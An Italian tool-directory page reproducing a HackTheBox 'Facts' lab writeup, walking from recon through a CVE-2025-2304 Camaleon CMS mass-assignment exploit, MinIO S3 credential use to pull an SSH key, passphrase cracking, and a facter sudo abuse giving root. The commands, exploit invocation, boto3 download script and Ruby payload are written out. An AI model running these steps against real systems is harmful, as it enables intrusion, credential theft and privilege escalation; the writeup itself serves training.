Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
HTB-Facts-Writeup — Analisi della macchina HackTheBox Facts — CVE-2025-2304, enumerazione MinIO S3, cracking della chiave SSH ed escalation dei privilegi con facter. | Kitploit
Strumenti/GitHubGitHub/karimelsheikh1/htb-facts-writeup
Password CrackingEscalation di PrivilegiRicognizioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebCTFPenetration TestingSicurezza Cloud

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Apprendimento e Formazione
GitHubkarimelsheikh1/htb-facts-writeup

HTB-Facts-Writeup

Analisi della macchina HackTheBox Facts — CVE-2025-2304, enumerazione MinIO S3, cracking della chiave SSH ed escalation dei privilegi con facter.

Vedi Repository
3 mesi faNon ancora revisionato

HackTheBox — Writeup della macchina Facts

HackTheBox Difficulty OS

Informazioni Macchina

CampoDettagli
NomeFacts
SOLinux
DifficoltàFacile
RilascioStagione 10
RitirataNo

Panoramica della Catena di Attacco

root@kitploit:~
Recon → Web Enumeration → CVE-2025-2304 (Mass Assignment) → S3/MinIO Credential Leak → SSH Key Extraction → Passphrase Cracking → User Shell → facter Sudo Abuse → Root

Strumenti Utilizzati


Ricognizione

Scansione Porte

root@kitploit:~
sudo nmap -p- --min-rate 5000 -T4 <TARGET_IP> -oN ports.nmap
sudo nmap -sV -sC -p 22,80,54321 <TARGET_IP>

Risultati:

root@kitploit:~
22/tcp    open  ssh     OpenSSH 9.9p1 Ubuntu
80/tcp    open  http    nginx 1.26.3 (Camaleon CMS)
54321/tcp open  http    MinIO S3 Server
root@kitploit:~
echo "<TARGET_IP> facts.htb" | sudo tee -a /etc/hosts

Enumerazione Web

root@kitploit:~
feroxbuster -u http://facts.htb -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -t 40
curl -s http://facts.htb/robots.txt
curl -s http://facts.htb/sitemap.xml

Reperti chiave:

  • CMS identificato: Camaleon CMS 2.9.0
  • Pannello di amministrazione: http://facts.htb/admin/login
  • Pagina di registrazione: http://facts.htb/admin/register

Accesso Iniziale

Passo 1 — Registrare un Account

Visita http://facts.htb/admin/register e crea un account. Nota che è presente un captcha — registrati tramite browser.

Passo 2 — CVE-2025-2304 (Escalation dei Privilegi tramite Mass Assignment)

L'endpoint updated_ajax utilizza permit! consentendo di aggiornare tutti i parametri, incluso role.

root@kitploit:~
git clone https://github.com/Alien0ne/CVE-2025-2304
cd CVE-2025-2304
python3 exploit.py -u http://facts.htb -U <username> -P <password> -e

Output:

root@kitploit:~
[+] Login confirmed
    Current User Role: client
[+] Updated User Role: admin
[+] Extracting S3 Credentials
    s3 access key: AKIAA5CA83CCFE35CD69
    s3 secret key: zOCRxURBa6wha6rksxj6kCmwvdAQNYX6NPw2o2+n
    s3 endpoint:   http://localhost:54321

Enumerazione Cloud — MinIO S3

La porta 54321 esegue un server compatibile con MinIO S3. Usando le credenziali trapelate:

root@kitploit:~
import boto3
from botocore.client import Config

s3 = boto3.client(
    's3',
    endpoint_url='http://facts.htb:54321',
    aws_access_key_id='AKIAA5CA83CCFE35CD69',
    aws_secret_access_key='zOCRxURBa6wha6rksxj6kCmwvdAQNYX6NPw2o2+n',
    config=Config(signature_version='s3v4'),
    region_name='us-east-1'
)

paginator = s3.get_paginator('list_objects_v2')
for page in paginator.paginate(Bucket='internal'):
    for o in page.get('Contents', []):
        if 'info-etags' not in o['Key']:
            print(o['Key'])
            s3.download_file('internal', o['Key'], '/tmp/' + o['Key'].replace('/', '_'))

File chiave trovati:

root@kitploit:~
.ssh/authorized_keys
.ssh/id_ed25519        ← Chiave privata SSH
.profile
.bashrc

Cracking della Chiave SSH

root@kitploit:~
chmod 600 /tmp/.ssh_id_ed25519
ssh2john /tmp/.ssh_id_ed25519 > ssh.hash
john ssh.hash --wordlist=/usr/share/wordlists/rockyou.txt

Passphrase craccata: dragonballz


Shell Utente

root@kitploit:~
ssh -i /tmp/.ssh_id_ed25519 [email protected]
# Enter passphrase: dragonballz
root@kitploit:~
cat /home/william/user.txt

Escalation dei Privilegi

Enumerazione

root@kitploit:~
sudo -l
root@kitploit:~
(ALL) NOPASSWD: /usr/bin/facter

Sfruttamento — Fact personalizzato di facter (Esecuzione di codice Ruby)

Facter carica fatti personalizzati come script Ruby. Poiché possiamo eseguirlo come root senza password, iniettiamo codice Ruby arbitrario:

root@kitploit:~
mkdir -p /tmp/facts
cat > /tmp/facts/pwn.rb << 'EOF'
Facter.add(:pwn) do
  setcode do
    exec("/bin/bash -p")
  end
end
EOF

sudo facter --custom-dir=/tmp/facts pwn

Shell di root ottenuta!

root@kitploit:~
whoami   # root
cat /root/root.txt

Punti Chiave

  • Mass assignment — le vulnerabilità di assegnazione di massa permettono escalation dei privilegi quando l'input non è adeguatamente filtrato
  • Bucket S3/MinIO malconfigurati possono esporre file sensibili, incluse chiavi private SSH
  • Passphrase deboli su chiavi SSH possono essere craccate con wordlist comuni come rockyou
  • Binari sudo con NOPASSWD devono sempre essere verificati per potenziali abusi
  • Incathenare piccole malconfigurazioni può portare al compromesso completo del sistema

Riferimenti

  • CVE-2025-2304 — Mass Assignment di Camaleon CMS
  • GTFOBins — facter
  • HackTheBox

Questo writeup è solo a scopo educativo. Esegui sempre test di sicurezza su sistemi di tua proprietà o per i quali hai esplicita autorizzazione.

Scarica lo strumento
StrumentoScopo
NmapScansione porte e rilevamento servizi
FeroxbusterEnumerazione directory web
CVE-2025-2304 PoCEscalation dei privilegi in Camaleon CMS
boto3 (Python)Enumerazione MinIO/S3 e download file
ssh2johnConvertire chiave SSH in hash craccabile
John the RipperCraccare passphrase della chiave SSH
facterEscalation dei privilegi tramite sudo malconfigurato